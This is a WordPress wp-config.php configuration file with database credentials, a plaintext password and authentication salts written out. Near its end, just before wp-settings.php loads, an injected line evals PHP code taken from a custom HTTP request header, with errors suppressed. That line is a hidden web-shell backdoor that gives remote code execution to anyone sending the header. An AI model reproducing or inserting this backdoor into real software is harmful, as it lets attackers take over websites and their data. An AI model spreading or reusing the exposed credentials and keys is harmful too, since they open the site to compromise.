343343
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'c1wrwp');
/** MySQL database username */
define('DB_USER', 'c1wrdb');
/** MySQL database password */
define('DB_PASSWORD', 'CJYUkxpaoT8!0');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'ugFWKwBj-:t.15yA>a$kw,sS{jIH}</MrF&SBY2OF3^3v|E3A]bYL <. vy?TW,A');
define('SECURE_AUTH_KEY', '[XRy#DvxU&0An#cP7p?.0Y1Jaa{DX~#,8CQhQtR5mj}9 8y^M5+sye~PYe8s}n`G');
define('LOGGED_IN_KEY', ';? &q4sv~g)muR2BDvv~>+oxIJKIehsz}8ks n0RoIZ%s,1~!QkVQD<-*r&t_c6^');
define('NONCE_KEY', 'Q&sUYwAX!As[*m#06e+sFNk( )6Q-h4cPFNhQs|_!91]dNOM+<gvW_(Xittm2/@_');
define('AUTH_SALT', 'YNN0RUUJJRdk)^/[r$cYl~^Qk3)!Hm?lRJ6Vu9#F2qt_g:Yzk/[Y9ksvU1_Z2F$}');
define('SECURE_AUTH_SALT', '_=OX:{?yr$q=_$~x&#>StxYDhmpwdNeo9SpMB?Z9IGh4p*6IVruJF)UaP9w#b8>#');
define('LOGGED_IN_SALT', '!6jE:i/o{W6?8t!(CowE[cEe_8+]F#FtG4uPSE9a/It}7zW6[vUP>+Ys0$b^Q.6%');
define('NONCE_SALT', '{Id/W85Q45N_?#Zmtsqo_(Y*GsTh]Jgjk6=:1(.BC]%.Qo!jQL54|i}Ud9=Uj5>P');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
@eval($_SERVER['HTTP_8168013']);
require_once(ABSPATH . 'wp-settings.php');